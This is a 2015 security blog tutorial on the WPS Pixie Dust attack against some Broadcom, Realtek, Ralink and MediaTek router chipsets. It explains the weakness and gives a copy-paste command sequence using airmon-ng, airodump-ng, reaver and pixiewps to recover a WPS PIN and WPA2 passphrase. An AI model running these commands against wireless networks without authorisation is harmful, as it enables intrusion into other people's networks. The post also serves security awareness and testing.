Subliminal Hacking
The Art and Science of Social Engineering


September 21, 2015

How To Crack WPS with Pixie Dust … Offline Attacking

In this post we are looking at how vulnerable WPS makes your Access Point. WiFi Protected Setup makes it nice and easy for you to connect to your wireless devices by using a simple pin number, instead of your hard to guess passphrase. The issue is that this means your secure 32 character passphrase is about as much use a chocolate fireguard, as instead of taking potentially years to crack, you can attack the pin number which only has 11,000 iterations and this can be cracked in hours (even with timeouts and other controls in place).

In this video we will show how a vulnerability in some of the chipsets of Wireless Access Points allows you to crack the WPS code in less than a second as well as revealing the WPA pin number. This attack is called the PixieDust attack, and it currently works on certain firmware on Broadcom, Realtek, Ralink and MediaTek chipsets. In the video this is demonstrated on an older BT HomeHub 3 which is using a Realtek chipset.

The way this works is that the Enrollee Hashes (E-Hash1 / E-Hash2) are supposed to be secret hashes, but when they are disclosed we can use them along with the Enrolle and Registrar Public Keys, along with the E & R Nonces and the Auth Key to decipher the WPS PIN Key.

Just to provide some comparison, using the WPS PixieDust attack we got the PIN and then the WPA2 Passphrase in less than a second. Stealing the WPA2 Hash and attacking this directly with a single GPU the time estimated to crack based on knowing its Alpha Numeric with no special characters is 853,399 days, 2 hours and 44 minutes, so year WPS add some weakness to your hardened access point 🙂

Below is the code used during the above video, you can use this easily copy and paste with your own information.


airmon-ng start wlan1

airmon-ng check kill

airodump-ng wlan1mon –wps

reaver -i wlan1mon -c <channel number> -b <ap mac address> -vv

pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <auth key> -n <e-nonce>

reaver -i wlan1mon -c <channel number> -b <ap mac address> -vv -K 1

If you are looking to do this on Ubuntu and not Kali, you will need the following packages (cheers Matt):

apt-get install install build-essential libnl-3-dev libnl-genl-3-dev


git clone

git clone

Finally, in the WPS column you need to be checking for one of the following to make sure the Access Point has WPS enabled, if it isnt its not supported on the device, or you have successfully disabled it. 1.0, LAB, PBC, NFC, PIN,

Be Sociable, Share!

    About the Author

    Dale Pearson
    has worked in IT since 1998, Infosec since 2004, and studied and performed hypnosis, mentalism etc since 2009. Dale is a full time Red Teamer with a love of social engineering and qualified hypnotherapist. He spends a great deal of time researching the various skills and techniques that make up the art and science of Social Engineering.


    Be the first to comment!

    Leave a Reply

    Your email address will not be published. Required fields are marked *

    Time limit is exhausted. Please reload CAPTCHA.

    This site uses Akismet to reduce spam. Learn how your comment data is processed.